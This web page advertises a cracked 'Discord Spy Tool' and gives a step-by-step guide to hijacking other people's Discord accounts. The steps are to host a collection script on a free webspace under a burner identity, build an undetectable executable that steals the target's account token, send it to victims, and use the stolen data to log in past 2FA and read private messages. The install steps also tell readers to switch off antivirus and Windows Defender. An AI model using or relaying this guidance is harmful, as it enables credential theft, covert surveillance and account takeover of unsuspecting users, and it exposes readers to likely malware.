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Discord Spy Tool Crack Download [ 2023 ] Latest Hack Software

This Tool allows you to spy on Discord users by giving you access to their account (unfortunately you can't change their email or password since that would require their password).

The basics of the Discord Spy Tool are very easy to understand. I provide you Discord Spy Tool Cracked Download Link & How To Use Discord Spy Tool Complete Guide below.

Discord Spy Tool

To gain access to someone's account so that you can spy on them you simply need to send them a file and wait for them to run it.

Once they've run the file you will need to download their data. Our custom program allows you to use that data to secretly login into their Discord account (this bypasses 2FA and you don't need their password).

About Spy Discord Tool

What is Discord Spy Tool?

It is the latest and advanced tool for hackers to hacks discords accounts. If you don't know about discord then I tell you that it is a popular social network like Telegram.

You can hack thousands or millions of dischord user accounts account by using this tool. It is a very simple and easy-to-use tool. Many people want to know how to spy on Discord voice chat? This tool helps you to spy on voice chat.

You can use this tool unlimited times free of cost. You can spy on your victims by using this discord spy bot without them even knowing.

Spy dicord tool provides you fast, stable and secure connection. You can redirect your victims to any website by dischord spy tool.

This tool interface is very user-friendly. You don't need any high knowledge of programming to use this tool. This tool also has a discord dm spy feature that is very powerful.

It works hidden and silently. It starts with windows. It is a persistence tool. It bypasses discords 2-factor authentication security.

discord spy tool download

Discords spy tool gains automatic access on your victims. You can fully spy on your victim's accounts every time. Discord spy tool download link provided below.

It generates a fully undetectable spy file. You simply send that file to your victims and when they will run that file then your discord spy bot virus runs in the background of their windows.

It is also known as the discord dm spy tool. It also spies on discord dm. In background working, dischord spy tool uses a discord user's account token to log each of their private messages between each other.

It is the best discord spying tool in the market. It is a paid tool but I provide you discord spy tool free of cost below.


  • Discord spy
  • Redirect to any webpage
  • Easy to use
  • Easy to setup
  • Auto-startup
  • Persistence
  • Bypass discord security
  • Stable connection
  • Secure connection
  • Unlimited uses
  • Live survelliance
  • Many more etc...

How To Use Dischord Spy Tool?

In this detailed guide, I will teach you how to use discord spy tool full method.

Step 1

Creating a webspace

1. First, you need to create a webspace in order to receive and store your target’s details.
2. We’ll just use a free webspace, hosted by 000webhost.
3. Sign up at the URL below and verify your email. (use a burner email)

TIP: Make sure not to use any names or passwords which can tie back to yourself. It is possible for someone who knows what they’re doing to get this URL. 


Upload the script

1. Now click the upload own website button.
2. Then double-click on ‘public_html’
3. Click the upload files button as shown above.
4. Then select the file which was included with this guide for upload.
5. Then click upload.
6. Next, right-click on the file, and then select Extract.
7.   When the popup box shows, just click extract.
8.   Close the next message box
9.   Now go to the following URL:
10. Click on the URL at the bottom of your application as shown in the image below.
11. Keep this URL open, as you will need it later


Creating an executable

1. Now, open the DiscordSpyTool.exe included with this guide. It should look like the following.
2. In the Webpage, textbox copy and paste the full URL of the webpage we opened. The textbox should contain something like this ( )
3. Now, append the following text to the end of the URL (without the quotation marks) “webscript/post.php”
5. If you want to display a fake error to the target, then tick the checkbox.
6. Then, click Create Executable.
7. Now you will need to save this file somewhere on your computer. Don’t run it though, as this is the file that will steal the target’s dischord details and upload them to the webspace.


Gaining account access

1. Now, you need to send the executable file produced to the target. 
2. Navigate to the following URL (replace app-123456789 with your app name)
3. If the target runs the executable, and has the Discord desktop client installed then a file will appear in the folder. If the folder is empty, then they have not run the executable.
4. If multiple files are displayed, then the executable has been run multiple times. 
5. Right-click on the latest file here, and click the Save link. Save the file somewhere memorable.
6. Now, if you don’t already have the Discord desktop client installed, then install it from the following URL:
7. Now, if you have the Discord client open then fully exit out of it by right-clicking the Discords icon in the taskbar and clicking ‘Quit Discord’.
8. Finally, click the “Start Spying” button on the Discord Spy Tool application.
9. Now, on the open box, navigate to the file we downloaded from our webspace and 
open it.
10. If the following message appears - then reopen Discord
11. You have successfully hijacked the target’s Discord account.
12. Instead fully exit out of Discord, as you did before. And click the “Stop Spying” button.
13. This should return you to your own account
Tip: Do not log out of the user's account! this will force you to perform the whole process again from STEP 4.

Download Requirements

These are two mandatory software. If you face any kind of error during discord spy tool cracked installations then download and install these softwares to solve your error and for smooth use.

spy discord

1. Microsoft Netframework 3.5 or 4.6.1 ( Download Here 3.5 ) ( Download Here 4.6.1 )

System Compatibility

It is properly tested on all windows operating systems. It can work perfectly on all windows operating systems after fulfilling their requirements.

  • Windows 11
  • Windows 10  ( Recommended System )
  • Windows 8.1
  • Windows 8
  • Windows 7

How To Install In Windows?

1. First of all Turn Off your antivirus
2. Download and extract the zip file
3. Now unzip it
4. Turn off windows defender real-time protection
5. Run discord spy bot.exe
6. Click on the install button
7. Enjoy.

Discord Spy Tool Download

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How To Download Software From Our Website?

  • Click on the blue download button
  • Wait for 15 seconds
  • Click here to get the link
  • Go to the link
  • Download and enjoy.


I hope you like this article and I am sure you have been successfully Discord Spy Tool Free Download. If you have any questions related to this article then drop your comment below. I will try to answer you as soon as possible.

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